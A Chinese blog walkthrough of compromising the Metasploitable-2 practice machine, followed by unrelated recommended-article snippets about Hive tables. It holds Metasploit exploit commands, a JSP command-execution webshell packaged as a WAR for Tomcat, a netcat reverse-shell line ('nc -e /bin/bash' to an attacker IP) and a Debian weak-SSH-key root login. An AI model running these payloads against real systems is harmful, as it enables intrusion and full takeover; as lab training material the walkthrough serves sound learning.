VulnHub Metasploitable-2

最新推荐文章于 2024-11-06 11:13:24 发布
最新推荐文章于 2024-11-06 11:13:24 发布
阅读量348 收藏 1
点赞数 2
分类专栏: 【精选】VulnHub 渗透测试靶场练习平台 web 文章标签: web安全 安全 linux vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SENMINGya/article/details/134087708
版权

一、信息收集

nmap扫描

访问80端口

二、漏洞利用

1.漏洞一

1.vsftpd 2.3.4(CVE-2011-2523)

2.msf

msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.103.189
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

2.漏洞二

samba 3.x

可疑看到开放了samba服务,版本是:samba 3.x

可疑上网搜一下这个samba 3.x版本msf要用到的payload

msf所要用到的命令:

search samba 3.x

use exploit/multi/samba/usermap_script

show payloads

set payload cmd/unix/reverse

show options

set RHOSTS 靶机IP

run

直接进入shell,是root权限

4.漏洞三

DVWA靶场

默认账号密码:

账号:admin
密码:password

5.漏洞四

Backdoor 后门

┌──(root💀kali)-[~/桌面]
└─# nc 192.168.103.189 1524

6.漏洞五

apache tomcat

1.访问80端口

首先查看第一个网站就是80端口

查看下8180端口下面的tomcat

2.tomcat漏洞

利用tomcat文件上传漏洞,点击tomcat manager

账号:tomcat
密码:tomcat

存在一个文件上传的上传点

3.上传war包

jsp的可回显马,将他打包成war上传

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

//jar -cvf 被打包的war包名字 jsp的可回显马
jar -cvf tomcats.war tomcat.jsp


然后我们访问下:
url:8180/war包名称/jsp木马完整名称

http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=id

发现回显出来的权限不高

4.反弹shell

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 4444
listening on [any] 4444 ...

http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=nc -e /bin/bash 192.168.103.129 4444
url编码:
http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=nc%20-e%20%2Fbin%2Fbash%20192.168.103.129%204444

python -c 'import pty; pty.spawn ("/bin/bash")'  #交互式shell

查看内核版本 uname -a

5.ssh公钥文件

最后在/root/.ssh目录中发现了一个公钥文件
这个在低版本中也是可以利用


因为这里版本较低,然后是猜测存在openssl软件包伪随机数泄露,这里将那个包下载过来
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
(debian_ssh_rsa_2048_x86.tar.bz2)


.tar.bz2
解压:tar jxvf FileName.tar.bz2
压缩:tar jcvf FileName.tar.bz2 DirName

tar jxvf 5622.tar.bz2

然后来到/rsa/2048目录下面

grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable *.pub
//使用命令查找

57c3115d77c56390332dc5c49978627a-5429

6.root权限

然后我们直接通过私钥就可以登录了,然后我们直接就登录进root了

┌──(root💀kali)-[~/routing/rsa/2048]
└─# ssh root@192.168.103.187 -i 57c3115d77c56390332dc5c49978627a-5429

Hive 内部表外部表深度解析:数据管理的最佳实践
最新发布
2401_83088008的博客
03-15 1025
Hive 数据管理中,内部表外部表的选择本质上是数据控制权与灵活性的权衡。原始数据层:外部表管理,确保数据主权中间处理层:内部表加工,提升处理效率结果输出层:外部表共享,支持多系统访问通过合理的表类型组合,企业可以在数据安全、处理效率跨平台协作之间找到最佳平衡点。未来随着 Hive 与湖仓架构的深度融合,这种设计模式将持续演进,成为大数据管理的核心范式。
Hive内部表外部表、分区表分桶表
cc876的博客
09-28 1768
hive是基于Hadoop的一个数据仓库工具,用来进行数据提取、化、加载,这是一种可以存储、查询分析存储在Hadoop中的大规模数据的机制。hive数据仓库工具能将结构化的数据文件映射为一张数据库表,并提供SQL查询功能,能将SQL语句变成MapReduce任务来执行。Hive的优点是学习成本低,可以通过类似SQL语句实现快速MapReduce统计,使MapReduce变得更加简单,而不必开发专门的MapReduce应用程序。hive十分适合对数据仓库进行统计分析。 ...
Hive编程指南-表创建、内部表外部表
Evankaka的专栏
02-10 5334
摘要:本文主要介绍了Hive创建表的一些知识,包含内部表外部表、分区分桶等。
Hive外部表转换
wanjialin的博客
11-10 1673
准备工作: 先用命令查一下表结构。desc formatted 表名; 可以看到是内部表。 操作命令: alter table 表名set tblproperties("EXTERNAL"="TRUE"); 然后再去使用命令desc formatted 表名;去查看表结构。 可以看到这时候已经是外表结构了。 ...
dataframe pandas 取得当前时间段的后一个时间点数据
a5601564的博客
09-28 2867
数据从星期一到星期五的日线数据形成周线数据,然后想定位到所对应的周线数据的情况,就可以通过 backfill参数实现。 data_day_df.index.get_loc(current_kline.open_time, method='backfill') open_time为当前的日线级数据。运算后得到周线数据。 ...
hive load data外部表报错_hive 内部表外部表
weixin_39640414的博客
11-24 251
hive以其优良的特性受到越来越多数据仓库使用者的青睐了,其与传统的数据库有相同点也有不同点,DDL操作也有基本相同,但是hive中的表分内部表外部表的概念(内部表对应hive中的MANAGED_TABLE,外部表对应hive中的EXTERNAL_TABLE),下面主要介绍一下两类表之间的主要区别:1、建表方式外表建表是需要添加external的关键字。--创建内部表 建表的时候也可以指定表的l...
hive内部表外部表区别及使用场景
晓晓的天空
04-29 3781
hive内部表外部表区别以及使用场景
hive外部表内部表区别
06-03
Hive 中,有两种类型的表:内部表外部表。它们的主要区别在于: 1. 存储位置:内部表的数据存储在 Hive 的数据仓库中,而外部表的数据存储在独立的存储系统中,如 HDFS、S3 等。 2. 数据管理:对于内部表,...
hive:外部表内部表
weixin_41391619的博客
12-05 371
首先建立一个外部表,放在hdfs的根目录下 create external table stu_external( id int, name string) row format delimited fields terminated by '\t' location '/student'; 向表中插入数据: load data local inpath '/opt/module/datas/student.txt' into table stu_external; 从下图可以看出,hdfs的
hive外部表改为内部表_2018-08-28期 Hive内部表外部表
weixin_39601194的博客
12-22 242
一、内部表外部表区别一般情况下不指定关键字External关键字创建的表都为内部表,数据默认存放在/user/hive/warehouse目录下外部表创建是需要指定External关键字,可以手动指定存放目录,有Location关键字指定,数据可以存放到Hdfs任意目录下。二、下面创建一个外部表t_org,存放的数据形式如下orgidorgnameorgytpeG0001xiaoshou01G0...
hive表内外表之间切换
别人笑我太疯癫,我笑他人看不穿。
11-06 529
你想把内表外表在元数据上达到切换的目的,这个操作有个前提,在apache版本源码上来讲是支持的!上面是把外表切换为内表,反之一样,在源码里面其实还支持很多东西,有兴趣可以看看,博主在源码中还看到sparksql能presto那样在group by后面写阿拉伯数字代替select后面的字段,就是用顺序表示字段,但可惜这个能力也是被关着的,从源码注释来看是担心操作上造成混淆的风险。
hive外部表改为内部表_hive 内部表外部表
weixin_40001245的博客
12-22 1503
载:https://blog.csdn.net/qq_36743482/article/details/78393678内部表&外部表未被external修饰的是内部表(managed table),被external修饰的为外部表(external table);区别内部表数据由Hive自身管理,外部表数据由HDFS管理;内部表数据存储的位置是hive.metastore.wareh...
hive外部表改为内部表_Hive内部表外部表
weixin_39809584的博客
12-22 965
前言总结一下Hive内部表外部表以及两者的区别。1、建表语句1.1 内部表平时创建的普通表为内部表createtable`test_internal`(idstringcomment'ID',namestringcomment'名字')comment'测试内部表'ROWFORMATDELIMITEDFIELDSTERMINATEDBY',';外部表带exter...
hive外部表改为内部表_【Hive教程】(八)HIVE内部表外部表
weixin_39983993的博客
12-22 714
内部表不多说,之前教程我们创建的全部都是内部表,因为我们没有加External关键字。内部表外部表区别内部表数据由Hive自身管理,外部表数据由HDFS管理;删除内部表会直接删除元数据(metadata)及存储数据,即对应HDFS的目录也会没有;而删除外部表仅仅会删除HIVE元数据,HDFS上的文件并不会被删除;内部表数据存储在数据仓库目录(hive.metastore.warehouse.d...
hive内部表外部表查看及相互
qq_42456324的博客
10-26 901
外部表转换内部表 alter table 外部表 set tblproperties ('EXTERNAL'='False'); 内部表转换外部表 alter table 内部表 set tblproperties ('EXTERNAL'='True'); 修改完成之后可以通过查看表的结构,查看是否转换成功 方法1 : desc formatted 表名; 方法2: describe extended 表名 如果是内部表,则会显示tableType:MANAGD_TAB
hive外部表改为内部表_HIVE内部表外部表
weixin_39712724的博客
02-06 871
Hive的数据表 创建数据文件 inner_table.dat创建表 hive>create table inner_table (key string);加载数据 hive>load data local inpath ‘/root/inner_table.dat’ into table inner_table;查看数据 hive> select * from inner_ta...
Hive---外部表内部表
大呱的博客
02-24 628
外部表内部表
hive外部表改为内部表,Hive外部表内部表命令
weixin_39830323的博客
12-22 158
Assuming I have these two tables:External:create external table emp_feedback (emp_id int,emp_name string)LOCATION '/user/hive/warehouse/mydb.db/contacts';Internal:create table emp_feedback (emp_id int...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一个想当文人的黑客

您的鼓励是对我最大的动力!!!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值